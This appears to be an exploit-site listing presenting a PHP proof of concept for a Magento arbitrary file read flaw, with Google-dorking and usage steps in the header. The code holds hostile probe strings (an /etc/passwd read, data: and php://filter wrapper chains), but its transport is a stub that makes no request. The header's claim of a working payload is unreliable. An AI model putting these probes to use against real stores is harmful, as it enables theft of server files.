## https://sploitus.com/exploit?id=PACKETSTORM:189476
=============================================================================================================================================
| # Title : Magento Adobe Commerce 2.4.4-p8 arbitrary file read Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://experienceleague.adobe.com/en/docs/commerce-operations/release/notes/security-patches/2-4-4-patches |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] CosmicSting: Magento Arbitrary File Read in the iconv() function of glibc.
[+] save code as poc.php .
[+] Line 83 : set your target.
[+] Usage : cmd => c:\www\test\php poc.php target.dz
[+] PayLoad :
<?php
class CosmicStingExploit {
    /**
     * Precondition probe skeleton for the file-read issue described above.
     *
     * The transport in downloadFile() is a stub that prints the requested
     * path and returns null, so checkMagento() fails at its first step and
     * check() always ends with the "preconditions not met" line; nothing in
     * this class issues a network request. The probe strings the class
     * builds (/etc/passwd, a data: URI, php://filter/ chains) are the
     * request-log and WAF indicators a defender would key on.
     */
    private $targetUrl;
    // Kept for parity with the original listing; no method reads it.
    private $downloadFileTimeout = 10;

    /**
     * @param string $url base URL of the host under test; stored only,
     *                    never requested by the code in this class
     */
    public function __construct($url) {
        $this->targetUrl = $url;
    }

    /**
     * Runs the three precondition checks in order, stopping at the first
     * failure, and prints a one-line verdict.
     */
    public function check() {
        echo "Setting up module...\n";
        $preconditionsMet = $this->checkMagento()
            && $this->checkPhpRequirements()
            && $this->checkLibcVersion();
        echo $preconditionsMet
            ? "Exploit preconditions met. Target appears to be vulnerable.\n"
            : "Exploit preconditions not met. Target may be safe.\n";
    }

    /**
     * First probe: asks the transport for /etc/passwd and reports whether
     * anything came back. With the stub transport this always returns false.
     */
    private function checkMagento(): bool {
        if ($this->downloadFile('/etc/passwd') === null) {
            echo "Unable to download /etc/passwd.\n";
            return false;
        }
        echo "/etc/passwd downloaded successfully.\n";
        return true;
    }

    /**
     * Second probe: round-trips a random token through three stream
     * wrappers (plain data: URI, php://filter over data:, and
     * php://filter/zlib.inflate over a deflated payload) and stops at the
     * first one whose result does not echo the token back unchanged.
     *
     * The token is fresh per run, so each probe request carries a unique
     * marker that can be matched up in server logs.
     */
    private function checkPhpRequirements(): bool {
        $token = bin2hex(random_bytes(25));
        $tokenB64 = base64_encode($token);
        $deflatedB64 = base64_encode($this->compress($token));

        // [probe path, message on success, message on failure], in probe order.
        $probes = [
            [
                "data:text/plain;base64,{$tokenB64}",
                "Data wrapper is working.\n",
                "Data wrapper not working.\n",
            ],
            [
                "php://filter//resource=data:text/plain;base64,{$tokenB64}",
                "Filter wrapper is working.\n",
                "Filter wrapper not working.\n",
            ],
            [
                "php://filter/zlib.inflate/resource=data:text/plain;base64,{$deflatedB64}",
                "Zlib extension is enabled.\n",
                "Zlib extension not enabled.\n",
            ],
        ];

        foreach ($probes as [$path, $okMessage, $failMessage]) {
            if ($this->downloadFile($path) !== $token) {
                echo $failMessage;
                return false;
            }
            echo $okMessage;
        }
        return true;
    }

    /**
     * Third probe, not implemented in this listing: unconditionally reports
     * success, so it never blocks the verdict.
     */
    private function checkLibcVersion(): bool {
        return true;
    }

    /**
     * Placeholder transport: echoes the path it was asked for and returns
     * null. No HTTP request is made, so every caller sees a failed download.
     *
     * @param string $filePath path or wrapper URI the probe wants to read
     * @return string|null always null in this listing
     */
    private function downloadFile(string $filePath) {
        echo "Attempting to download {$filePath}\n";
        return null;
    }

    /**
     * Raw DEFLATE at maximum compression; paired with zlib.inflate in the
     * third probe above.
     *
     * @param string $data bytes to deflate
     */
    private function compress(string $data) {
        return gzdeflate($data, 9);
    }
}
// Usage
// Entry point: construct the probe against the placeholder host and run the
// precondition checks; with the stub transport this prints the "not met" verdict.
$exploit = new CosmicStingExploit(
    "http://target-application-url.com",
);
$exploit->check();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================